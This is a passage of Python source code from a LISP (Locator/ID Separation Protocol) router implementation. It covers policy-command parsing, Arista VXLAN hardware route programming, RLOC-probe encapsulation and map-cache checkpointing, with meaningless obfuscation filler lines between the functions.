if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
def lisp_get_echo_nonce(rloc, rloc_str):
    """Return stored echo-nonce state for an RLOC, or None.

    Returns None when nonce echoing is disabled or no state exists for
    the RLOC. When 'rloc' is supplied its printed address overrides
    'rloc_str' as the lookup key.
    """
    if (lisp_nonce_echoing == False): return (None)

    if (rloc): rloc_str = rloc.print_address_no_iid()
    return (lisp_nonce_echo_list.get(rloc_str, None))
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
if 40 - 40: iII111i - I1IiiI + OoOoOO00
if 2 - 2: I11i - II111iiii / I1Ii111
if 27 - 27: OoO0O00 - I1ii11iIi11i * i11iIiiIii + Oo0Ooo
if 29 - 29: I1ii11iIi11i / IiII . I1Ii111 + Ii1I + OoO0O00
if 76 - 76: ooOoO0o . I11i * OoO0O00
def lisp_decode_dist_name(packet):
    """Parse a null-terminated distinguished-name from the front of
    'packet'.

    Returns (remaining-packet, name) with the null terminator consumed,
    or [None, None] when no terminator is found within 255 characters.
    """
    name_chars = []

    while (packet[0:1] != "\0"):
        # Bound the name length; malformed input returns a failure pair.
        if (len(name_chars) == 255): return ([None, None])
        name_chars.append(packet[0:1])
        packet = packet[1::]

    packet = packet[1::]
    return (packet, "".join(name_chars))
if 26 - 26: iIii1I11I1II1 - I11i . Oo0Ooo - I1Ii111
if 3 - 3: I1IiiI + I1ii11iIi11i - I11i
if 15 - 15: OoOoOO00 . Oo0Ooo / ooOoO0o + Oo0Ooo - OoooooooOO - o0oOOo0O0Ooo
if 64 - 64: OOooOOo
if 44 - 44: O0 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii . OoOoOO00
if 32 - 32: I1ii11iIi11i - iII111i
if 34 - 34: OOooOOo . i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1ii11iIi11i
if 32 - 32: i11iIiiIii . I1Ii111
def lisp_write_flow_log(flow_log):
    """Append buffered flow entries to ./logs/lisp-flow.log.

    Each entry is a 4-tuple whose last element formats the flow via
    print_flow(ts, a, b) using the first three elements. Logs the
    number of entries written.
    """
    count = 0
    with open("./logs/lisp-flow.log", "a") as log_file:
        for entry in flow_log:
            packet = entry[3]
            log_file.write(packet.print_flow(entry[0], entry[1], entry[2]))
            count += 1

    del (flow_log)

    lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(
        bold(str(count), False)))
    return
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
def _lisp_policy_match_values(values, match_clauses):
    """Yield (value, match-clause) pairs, pairing each non-empty
    configured value positionally with its match clause."""
    for i in range(len(match_clauses)):
        if (values[i] == ""): continue
        yield values[i], match_clauses[i]

def _lisp_policy_new_address():
    """Return an empty lisp_address used to hold a policy EID or RLOC."""
    return (lisp_address(LISP_AFI_NONE, "", 0, 0))

def _lisp_policy_store_eid(match_clause, attr, prefix):
    """Store EID 'prefix' into match-clause attribute 'attr', creating
    the address if needed and preserving any instance-id already set on
    it (e.g. by a prior "instance-id" clause)."""
    eid = getattr(match_clause, attr)
    if (eid is None):
        eid = _lisp_policy_new_address()
        setattr(match_clause, attr, eid)
    iid = eid.instance_id
    eid.store_prefix(prefix)
    eid.instance_id = iid

def lisp_policy_command(kv_pair):
    """Process a "lisp policy" command.

    'kv_pair' maps each command keyword to its parsed value. Match
    sub-clause keywords arrive as positional arrays with one slot per
    match clause (the number of clauses is the length of the
    "datetime-range" array); "set-*" and "policy-name" keywords carry a
    single value applied to the policy itself. Builds a lisp_policy
    with its match clauses and saves it.
    """
    policy = lisp_policy("")
    set_iid = None

    #
    # One match clause per configured "match" sub-command.
    #
    match_clauses = [lisp_policy_match() for _ in
        range(len(kv_pair["datetime-range"]))]

    #
    # Match keywords that simply store their string value, and the two
    # that store an RLOC prefix, mapped to their attribute names.
    #
    name_attrs = {"rloc-record-name": "rloc_record_name",
        "geo-name": "geo_name", "elp-name": "elp_name",
        "rle-name": "rle_name", "json-name": "json_name"}
    rloc_attrs = {"source-rloc": "source_rloc",
        "destination-rloc": "dest_rloc"}

    for keyword in kv_pair.keys():
        value = kv_pair[keyword]

        #
        # Per-match-clause keywords.
        #
        if (keyword == "instance-id"):
            for iid, match in _lisp_policy_match_values(value, match_clauses):
                if (match.source_eid is None):
                    match.source_eid = _lisp_policy_new_address()
                if (match.dest_eid is None):
                    match.dest_eid = _lisp_policy_new_address()
                match.source_eid.instance_id = int(iid)
                match.dest_eid.instance_id = int(iid)

        if (keyword == "source-eid"):
            for prefix, match in _lisp_policy_match_values(value,
                match_clauses):
                _lisp_policy_store_eid(match, "source_eid", prefix)

        if (keyword == "destination-eid"):
            for prefix, match in _lisp_policy_match_values(value,
                match_clauses):
                _lisp_policy_store_eid(match, "dest_eid", prefix)

        if (keyword in rloc_attrs):
            for prefix, match in _lisp_policy_match_values(value,
                match_clauses):
                rloc = _lisp_policy_new_address()
                rloc.store_prefix(prefix)
                setattr(match, rloc_attrs[keyword], rloc)

        if (keyword in name_attrs):
            for name, match in _lisp_policy_match_values(value,
                match_clauses):
                setattr(match, name_attrs[keyword], name)

        if (keyword == "datetime-range"):
            # Value is "<lower><upper>" with each datetime 19 chars.
            for dt, match in _lisp_policy_match_values(value, match_clauses):
                lower = lisp_datetime(dt[0:19])
                upper = lisp_datetime(dt[19::])
                if (lower.valid_datetime() and upper.valid_datetime()):
                    match.datetime_lower = lower
                    match.datetime_upper = upper

        #
        # Policy-wide "set" keywords.
        #
        if (keyword == "set-action"):
            policy.set_action = value
        if (keyword == "set-record-ttl"):
            policy.set_record_ttl = int(value)
        if (keyword == "set-instance-id"):
            if (policy.set_source_eid is None):
                policy.set_source_eid = _lisp_policy_new_address()
            if (policy.set_dest_eid is None):
                policy.set_dest_eid = _lisp_policy_new_address()
            set_iid = int(value)
            policy.set_source_eid.instance_id = set_iid
            policy.set_dest_eid.instance_id = set_iid
        if (keyword == "set-source-eid"):
            if (policy.set_source_eid is None):
                policy.set_source_eid = _lisp_policy_new_address()
            policy.set_source_eid.store_prefix(value)
            # Reapply the set-instance-id if one was already processed.
            if (set_iid is not None):
                policy.set_source_eid.instance_id = set_iid
        if (keyword == "set-destination-eid"):
            if (policy.set_dest_eid is None):
                policy.set_dest_eid = _lisp_policy_new_address()
            policy.set_dest_eid.store_prefix(value)
            if (set_iid is not None):
                policy.set_dest_eid.instance_id = set_iid
        if (keyword == "set-rloc-address"):
            policy.set_rloc_address = _lisp_policy_new_address()
            policy.set_rloc_address.store_address(value)
        if (keyword == "set-rloc-record-name"):
            policy.set_rloc_record_name = value
        if (keyword == "set-elp-name"):
            policy.set_elp_name = value
        if (keyword == "set-geo-name"):
            policy.set_geo_name = value
        if (keyword == "set-rle-name"):
            policy.set_rle_name = value
        if (keyword == "set-json-name"):
            policy.set_json_name = value
        if (keyword == "policy-name"):
            policy.policy_name = value

    #
    # Store match clauses and save the policy.
    #
    policy.match_clauses = match_clauses
    policy.save_policy()
    return
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
#
# Command table for the "lisp policy" configuration command; the
# handler is lisp_policy_command(). Each clause keyword maps to a
# parse-descriptor list: a boolean flag, optionally followed by a
# numeric min/max range or an enumeration of allowed string values.
# NOTE(review): descriptor semantics inferred from shape — confirm
# against the command-parsing code that consumes this table.
#
lisp_policy_commands = {
    "lisp policy" : [ lisp_policy_command , {
        "policy-name" : [ True ] ,
        "match" : [ ] ,
        "instance-id" : [ True , 0 , 0xffffffff ] ,
        "source-eid" : [ True ] ,
        "destination-eid" : [ True ] ,
        "source-rloc" : [ True ] ,
        "destination-rloc" : [ True ] ,
        "rloc-record-name" : [ True ] ,
        "elp-name" : [ True ] ,
        "geo-name" : [ True ] ,
        "rle-name" : [ True ] ,
        "json-name" : [ True ] ,
        "datetime-range" : [ True ] ,
        "set-action" : [ False , "process" , "drop" ] ,
        "set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
        "set-instance-id" : [ True , 0 , 0xffffffff ] ,
        "set-source-eid" : [ True ] ,
        "set-destination-eid" : [ True ] ,
        "set-rloc-address" : [ True ] ,
        "set-rloc-record-name" : [ True ] ,
        "set-elp-name" : [ True ] ,
        "set-geo-name" : [ True ] ,
        "set-rle-name" : [ True ] ,
        "set-json-name" : [ True ] } ]
}
if 16 - 16: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii . I1ii11iIi11i
if 65 - 65: II111iiii * iII111i - OoO0O00 + oO0o % OoO0O00
if 83 - 83: OoooooooOO % I1ii11iIi11i . IiII + OOooOOo . iII111i - ooOoO0o
if 100 - 100: o0oOOo0O0Ooo
if 95 - 95: iII111i * oO0o * i1IIi
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
def lisp_send_to_arista(command, interface):
    """Run Arista CLI 'command' on the switch via FastCli.

    When 'interface' is non-None the command is applied under that
    interface's configuration context; otherwise it runs in global
    configuration mode.
    """
    interface = "" if (interface == None) else "interface " + interface

    display = command if (interface == "") else interface + ": " + command
    lprint("Send CLI command '{}' to hardware".format(display))

    commands = '''
enable
configure
{}
{}
'''.format(interface, command)

    os.system("FastCli -c '{}'".format(commands))
    return
if 92 - 92: OoOoOO00 + oO0o
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
if 12 - 12: I1Ii111 * OOooOOo
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
def lisp_arista_is_alive(prefix):
    """Return True when Arista hardware reports route 'prefix' as
    programmed (last column of the FastCli output line is "Y")."""
    cli = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    output = commands.getoutput("FastCli -c '{}'".format(cli))

    #
    # Take the first line after the header; the last column carries the
    # hardware-programmed flag. Strip any carriage-return.
    #
    output = output.split("\n")[1]
    flag = output.split(" ")[-1].replace("\r", "")

    return (flag == "Y")
if 36 - 36: I11i / II111iiii . oO0o - ooOoO0o % iII111i % OoOoOO00
if 13 - 13: iIii1I11I1II1 - Oo0Ooo % IiII / iII111i - I1Ii111
if 46 - 46: OoO0O00 / iII111i
if 21 - 21: iIii1I11I1II1 / I1Ii111 * I1ii11iIi11i / Oo0Ooo . Oo0Ooo
if 2 - 2: Oo0Ooo + i11iIiiIii . I1ii11iIi11i * I1Ii111
if 22 - 22: I1ii11iIi11i . i1IIi + I1ii11iIi11i / OoooooooOO - i11iIiiIii / iIii1I11I1II1
if 96 - 96: o0oOOo0O0Ooo . I1Ii111 + Oo0Ooo . I11i + ooOoO0o
if 33 - 33: OoO0O00 / OOooOOo % Oo0Ooo . o0oOOo0O0Ooo % II111iiii
if 62 - 62: iII111i . OoooooooOO - i1IIi
if 59 - 59: OoOoOO00 + i1IIi * OoooooooOO . oO0o
if 38 - 38: I1ii11iIi11i / o0oOOo0O0Ooo
if 95 - 95: iIii1I11I1II1 / OoOoOO00 % I1Ii111
if 54 - 54: OoooooooOO % Ii1I
if 100 - 100: OOooOOo - I11i . O0 * i1IIi % OoooooooOO - ooOoO0o
if 54 - 54: O0 + I11i
if 71 - 71: OoOoOO00
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
if 58 - 58: I1Ii111 / OoooooooOO . I11i % I1Ii111
if 8 - 8: Oo0Ooo % ooOoO0o / i11iIiiIii
if 54 - 54: IiII
if 85 - 85: OOooOOo - i1IIi
if 10 - 10: I1ii11iIi11i
if 3 - 3: ooOoO0o * O0 / o0oOOo0O0Ooo
if 22 - 22: OoOoOO00 + OOooOOo . iII111i % iIii1I11I1II1 - I11i
if 23 - 23: OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
if 73 - 73: Oo0Ooo + II111iiii - IiII
if 60 - 60: i1IIi . i11iIiiIii / i1IIi . I11i % OOooOOo
if 47 - 47: oO0o + IiII * I1Ii111 % o0oOOo0O0Ooo - O0 % IiII
if 66 - 66: II111iiii * I1IiiI . Oo0Ooo * OoooooooOO % OoOoOO00 . II111iiii
def lisp_program_vxlan_hardware(mc):
    """Program Arista hardware to VXLAN-forward map-cache entry 'mc'.

    Synthesizes an unused next-hop address on vlan4094 whose MAC
    encodes the low three octets of the entry's best RLOC, then
    installs: (1) a static ARP entry for that next-hop, (2) a static
    MAC-table entry steering the MAC to the VXLAN VTEP, and (3) a
    kernel route for the EID-prefix via the next-hop.
    """

    #
    # Only run on a box with the lispers.net install directory.
    #
    if (os.path.exists("/persist/local/lispers.net") == False): return

    #
    # Need at least one RLOC to forward to.
    #
    if (len(mc.best_rloc_set) == 0): return

    eid_prefix = mc.eid.print_prefix_no_iid()
    rloc_addr = mc.best_rloc_set[0].rloc.print_address_no_iid()

    #
    # Nothing to do when the kernel already routes the EID via vlan4094.
    #
    route = commands.getoutput(
        "ip route get {} | egrep vlan4094".format(eid_prefix))
    if (route != ""):
        lprint("Route {} already in hardware: '{}'".format(
            green(eid_prefix, False), route))
        return

    #
    # Verify the vxlan and vlan4094 interfaces exist and that vlan4094
    # has an IP address to derive a next-hop from.
    #
    interfaces = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (interfaces.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return
    if (interfaces.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return

    vlan_addr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (vlan_addr == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return
    vlan_addr = vlan_addr.split("inet ")[1]
    vlan_addr = vlan_addr.split("/")[0]

    #
    # Collect vlan4094 addresses with incomplete ARP entries so the
    # synthesized next-hop avoids them.
    #
    skip_addrs = []
    for arp_line in commands.getoutput("arp -i vlan4094").split("\n"):
        if (arp_line.find("vlan4094") == -1): continue
        if (arp_line.find("(incomplete)") == -1): continue
        skip_addrs.append(arp_line.split(" ")[0])

    #
    # Pick a free host address in the vlan4094 subnet for the next-hop,
    # skipping collected addresses and our own.
    #
    nexthop = None
    our_addr = vlan_addr
    octets = vlan_addr.split(".")
    for host in range(1, 255):
        octets[3] = str(host)
        candidate = ".".join(octets)
        if (candidate in skip_addrs): continue
        if (candidate == our_addr): continue
        nexthop = candidate
        break

    if (nexthop == None):
        lprint("Address allocation failed for vlan4094, cannot program " +
            "hardware")
        return

    #
    # Encode the RLOC's low three octets in the next-hop MAC and add a
    # static ARP entry for it on vlan4094.
    #
    rloc_octets = rloc_addr.split(".")
    byte1 = lisp_hex_string(rloc_octets[1]).zfill(2)
    byte2 = lisp_hex_string(rloc_octets[2]).zfill(2)
    byte3 = lisp_hex_string(rloc_octets[3]).zfill(2)
    mac = "00:00:00:{}:{}:{}".format(byte1, byte2, byte3)
    arista_mac = "0000.00{}.{}{}".format(byte1, byte2, byte3)
    arp_command = "arp -i vlan4094 -s {} {}".format(nexthop, mac)
    os.system(arp_command)

    #
    # Steer the synthesized MAC to the VXLAN VTEP in the MAC table.
    #
    mac_command = ("mac address-table static {} vlan 4094 " +
        "interface vxlan 1 vtep {}").format(arista_mac, rloc_addr)
    lisp_send_to_arista(mac_command, None)

    #
    # Route the EID-prefix via the synthesized next-hop.
    #
    route_command = "ip route add {} via {}".format(eid_prefix, nexthop)
    os.system(route_command)

    lprint("Hardware programmed with commands:")
    route_command = route_command.replace(eid_prefix,
        green(eid_prefix, False))
    lprint("    " + route_command)
    lprint("    " + arp_command)
    mac_command = mac_command.replace(rloc_addr, red(rloc_addr, False))
    lprint("    " + mac_command)
    return
if 27 - 27: IiII . Oo0Ooo
if 70 - 70: ooOoO0o + OoooooooOO
if 17 - 17: iIii1I11I1II1
if 25 - 25: I1ii11iIi11i * I11i
if 33 - 33: oO0o / II111iiii
if 90 - 90: o0oOOo0O0Ooo - iIii1I11I1II1 + i1IIi - OoO0O00 + IiII
if 40 - 40: i11iIiiIii . i11iIiiIii - OoOoOO00 - oO0o
def lisp_clear_hardware_walk(mc, parms):
    """Map-cache walk callback: delete the kernel route for entry 'mc'.
    Always returns [True, None] so the walk continues."""
    prefix = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(prefix))
    return ([True, None])
if 42 - 42: IiII + OoooooooOO / OoooooooOO . ooOoO0o / i11iIiiIii / II111iiii
if 10 - 10: iII111i . I1IiiI
if 74 - 74: II111iiii * O0
if 57 - 57: OoO0O00
if 12 - 12: o0oOOo0O0Ooo . I1Ii111 . oO0o % Oo0Ooo * OoooooooOO
if 25 - 25: OoO0O00
if 54 - 54: O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
def lisp_clear_map_cache():
    """Clear the map-cache and all state derived from it.

    Resets the RLOC-probe list, per-RLOC encap/decap crypto keys, the
    RTR list, and gleaned-group state; removes hardware routes when
    hardware programming is enabled; and tells the external data-plane
    to restart with an empty cache.
    """
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups

    banner = bold("User cleared", False)
    entry_count = lisp_map_cache.cache_count
    lprint("{} map-cache with {} entries".format(banner, entry_count))

    #
    # Remove hardware routes before discarding the cache entries.
    #
    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)

    lisp_map_cache = lisp_cache()

    #
    # Drop all per-RLOC state keyed off the old cache entries.
    #
    lisp_rloc_probe_list = {}
    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}
    lisp_rtr_list = {}
    lisp_gleaned_groups = {}

    #
    # Tell the external data-plane to clear its map-cache as well.
    #
    lisp_process_data_plane_restart(True)
    return
if 73 - 73: OoO0O00 % iIii1I11I1II1 + IiII * I1Ii111 % II111iiii
if 20 - 20: I11i % I1ii11iIi11i . OoO0O00 % OoOoOO00
if 84 - 84: OoooooooOO / i11iIiiIii . IiII / I1IiiI
if 62 - 62: iII111i - I1IiiI + OoooooooOO
if 59 - 59: iIii1I11I1II1 + i11iIiiIii * oO0o . Oo0Ooo . I1Ii111
if 49 - 49: II111iiii
if 99 - 99: Oo0Ooo . OOooOOo
if 85 - 85: OoOoOO00 . IiII + oO0o - II111iiii
if 70 - 70: O0 % I1Ii111
if 13 - 13: I1ii11iIi11i % OoO0O00 / Ii1I * IiII
if 82 - 82: ooOoO0o % Oo0Ooo
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    """Data-encapsulate a RLOC-probe for NAT-traversal and transmit it.

    The probe in 'packet' (a raw IPv4 packet) is prepended with an outer
    IPv4 + UDP header addressed to 'rloc' and sent as a LISP data packet
    so it traverses existing NAT state.  'lisp_sockets' must be the
    4-entry socket array; entry 3 is the raw send socket.  'nat_info',
    when present, supplies the translated port and peer hostname.
    """
    if len(lisp_sockets) != 4: return

    local_rloc = lisp_myrlocs[0]

    # Outer IPv4 header (20 bytes) + UDP header (8 bytes) -> +28 total.
    total_length = len(packet) + 28
    ip_header = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(total_length),
        0, 64, 17, 0, socket.htonl(local_rloc.address),
        socket.htonl(rloc.address))
    ip_header = lisp_ip_checksum(ip_header)

    # UDP header: source port 0, destination the LISP control port.
    udp_header = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(total_length - 20), 0)

    packet = lisp_packet(ip_header + udp_header + packet)

    # Fill in inner and outer addressing for the encapsulation.
    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(local_rloc)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(local_rloc)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    rloc_string = red(rloc.print_address_no_iid(), False)
    if nat_info:
        hostname = " {}".format(blue(nat_info.hostname, False))
        probe_type = bold("RLOC-probe request", False)
    else:
        hostname = ""
        probe_type = bold("RLOC-probe reply", False)

    lprint("Data encapsulate {} to {}{} port {} for NAT-traversal".format(
        probe_type, rloc_string, hostname, packet.encap_port))

    # Encode the LISP header; bail if encoding failed.
    if packet.encode(None) == None: return
    packet.print_packet("Send", True)

    raw_socket = lisp_sockets[3]
    packet.send_packet(raw_socket, packet.outer_dest)
    del(packet)
    return
if 81 - 81: OoO0O00
if 66 - 66: OoooooooOO * OoOoOO00 . iII111i + iIii1I11I1II1 * O0 % OOooOOo
if 72 - 72: iII111i * Oo0Ooo - i11iIiiIii . OoooooooOO
if 85 - 85: O0 * i1IIi
if 29 - 29: i11iIiiIii
if 34 - 34: OoOoOO00
if 17 - 17: oO0o * OoOoOO00 % OoO0O00 % I1IiiI * I11i
if 78 - 78: OoooooooOO . I1Ii111 + Ii1I - II111iiii - IiII / iIii1I11I1II1
def lisp_get_default_route_next_hops():
    """Return default-route next-hops as a list of [device, gateway].

    On macOS, "route -n get default" is parsed and a single pair is
    returned.  On Linux, "ip route" default entries are parsed; any line
    carrying a metric is skipped.
    """
    if lisp_is_macos():
        output = commands.getoutput("route -n get default").split("\n")
        gateway = device = None
        for line in output:
            if line.find("gateway: ") != -1: gateway = line.split(": ")[1]
            if line.find("interface: ") != -1: device = line.split(": ")[1]
        return [[device, gateway]]

    # Linux: one "default via <gw> dev <device> ..." line per next-hop.
    output = commands.getoutput("ip route | egrep 'default via'").split("\n")

    next_hops = []
    for line in output:
        if line.find(" metric ") != -1: continue
        fields = line.split(" ")
        try:
            gw_index = fields.index("via") + 1
            if gw_index >= len(fields): continue
            dev_index = fields.index("dev") + 1
            if dev_index >= len(fields): continue
        except:
            # "via" or "dev" keyword missing from this line.
            continue

        next_hops.append([fields[dev_index], fields[gw_index]])
    return next_hops
if 32 - 32: iII111i
if 99 - 99: o0oOOo0O0Ooo . oO0o
if 9 - 9: oO0o % OoooooooOO
if 62 - 62: OoO0O00 / OoOoOO00 / I1Ii111 + Oo0Ooo - Ii1I
if 72 - 72: OoO0O00 + I11i / iII111i % OOooOOo
if 5 - 5: oO0o % OOooOOo
if 95 - 95: OoOoOO00 + OoooooooOO - O0 + o0oOOo0O0Ooo
def lisp_get_host_route_next_hop(rloc):
    """Return the next-hop address of the host route for 'rloc'.

    Parses "ip route" output; returns None when no host route (or no
    "via" clause) is found.
    """
    command = "ip route | egrep '{} via'".format(rloc)
    fields = commands.getoutput(command).split(" ")

    try:
        nh_index = fields.index("via") + 1
    except:
        return None

    if nh_index >= len(fields): return None
    return fields[nh_index]
if 92 - 92: Ii1I % Ii1I . I11i / i1IIi % Oo0Ooo
if 25 - 25: o0oOOo0O0Ooo - OoO0O00 - OoOoOO00 - ooOoO0o
if 28 - 28: OOooOOo * ooOoO0o * OoooooooOO % IiII
if 9 - 9: OoooooooOO
if 92 - 92: I1Ii111 + O0 + OoO0O00 % IiII
if 31 - 31: Ii1I / Oo0Ooo - I1IiiI - I11i - i11iIiiIii
if 45 - 45: ooOoO0o - IiII / OoO0O00 / IiII
def lisp_install_host_route(dest, nh, install):
    """Add or delete a /32 host route to 'dest' via next-hop 'nh'.

    'install' True adds the route, False deletes it.  A None next-hop
    builds the route command without a "via" clause.
    """
    action = "add" if install else "delete"
    nh_string = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(action.title(), dest, nh_string))

    if nh == None:
        command = "ip route {} {}/32".format(action, dest)
    else:
        command = "ip route {} {}/32 via {}".format(action, dest, nh)

    os.system(command)
    return
if 25 - 25: I1Ii111 % Oo0Ooo + OoO0O00 % OOooOOo
if 85 - 85: I1IiiI . i11iIiiIii - ooOoO0o * I11i * OoOoOO00 * I11i
if 29 - 29: I1Ii111 * I1Ii111 . iII111i + o0oOOo0O0Ooo
if 57 - 57: I1Ii111 - IiII
if 89 - 89: oO0o + iII111i
if 52 - 52: OOooOOo % O0 * I1ii11iIi11i . I1ii11iIi11i / IiII
if 7 - 7: II111iiii
if 7 - 7: iIii1I11I1II1 . O0 + Ii1I % I1IiiI * O0 + OoO0O00
def lisp_checkpoint(checkpoint_list):
    """Write the map-cache checkpoint entries to the checkpoint file.

    'checkpoint_list' is a list of pre-formatted text lines (built by
    lisp_write_checkpoint_entry()).  No-op unless checkpointing is
    enabled via the lisp_checkpoint_map_cache global.

    Fix: use a 'with' block so the file descriptor is not leaked when a
    write raises (the original left the file open on exception).
    """
    if lisp_checkpoint_map_cache == False: return

    with open(lisp_checkpoint_filename, "w") as checkpoint_file:
        for entry in checkpoint_list:
            checkpoint_file.write(entry + "\n")

    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
if 99 - 99: OoO0O00 - OoOoOO00 + OoO0O00
if 67 - 67: I1Ii111
if 31 - 31: OoO0O00 * Oo0Ooo % O0 * II111iiii + ooOoO0o * I1IiiI
if 77 - 77: ooOoO0o
if 98 - 98: I1Ii111 + I1ii11iIi11i % OoO0O00 * Ii1I + iII111i
if 6 - 6: iII111i / iII111i . i11iIiiIii
if 12 - 12: I11i - OoO0O00
def lisp_load_checkpoint():
    """Reload map-cache entries previously saved by lisp_checkpoint().

    Each file line is "<eid-prefix> rloc <addr> <prio> <weight>, ..." or
    "<eid-prefix> rloc native-forward".  Loaded entries are flagged as
    checkpoint entries and given the NMR TTL.
    """
    if lisp_checkpoint_map_cache == False: return
    if os.path.exists(lisp_checkpoint_filename) == False: return

    checkpoint_file = open(lisp_checkpoint_filename, "r")

    count = 0
    for line in checkpoint_file:
        count += 1
        eid_and_rlocs = line.split(" rloc ")

        # "native-forward" or an empty RLOC side means no RLOC records.
        if eid_and_rlocs[1] in ["native-forward\n", "\n"]:
            rloc_strings = []
        else:
            rloc_strings = eid_and_rlocs[1].split(", ")

        rloc_set = []
        for rloc_string in rloc_strings:
            rloc_entry = lisp_rloc(False)
            fields = rloc_string.split(" ")
            rloc_entry.rloc.store_address(fields[0])
            rloc_entry.priority = int(fields[1])
            rloc_entry.weight = int(fields[2])
            rloc_set.append(rloc_entry)

        mc = lisp_mapping("", "", rloc_set)
        if mc != None:
            mc.eid.store_prefix(eid_and_rlocs[0])
            mc.checkpoint_entry = True
            mc.map_cache_ttl = LISP_NMR_TTL * 60
            if rloc_set == []: mc.action = LISP_NATIVE_FORWARD_ACTION
            mc.add_cache()
            continue

        # Mapping could not be built; don't count this line.
        count -= 1

    checkpoint_file.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), count, lisp_checkpoint_filename))
    return
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
if 98 - 98: iII111i . oO0o - O0 % I1IiiI . I1ii11iIi11i / i1IIi
if 72 - 72: I1IiiI / Oo0Ooo % IiII - O0 / O0 * O0
if 83 - 83: O0 / I1Ii111 - OoooooooOO
if 42 - 42: Ii1I / i1IIi - IiII / I1Ii111
if 39 - 39: OoooooooOO
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
if 92 - 92: Ii1I - O0 - i11iIiiIii + IiII % I1Ii111 + II111iiii
if 71 - 71: ooOoO0o * I1Ii111 + i11iIiiIii + i1IIi . I1IiiI
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    """Append one checkpoint text line for map-cache entry 'mc'.

    Format: "<eid-prefix> rloc <addr> <prio> <weight>, ..." with the
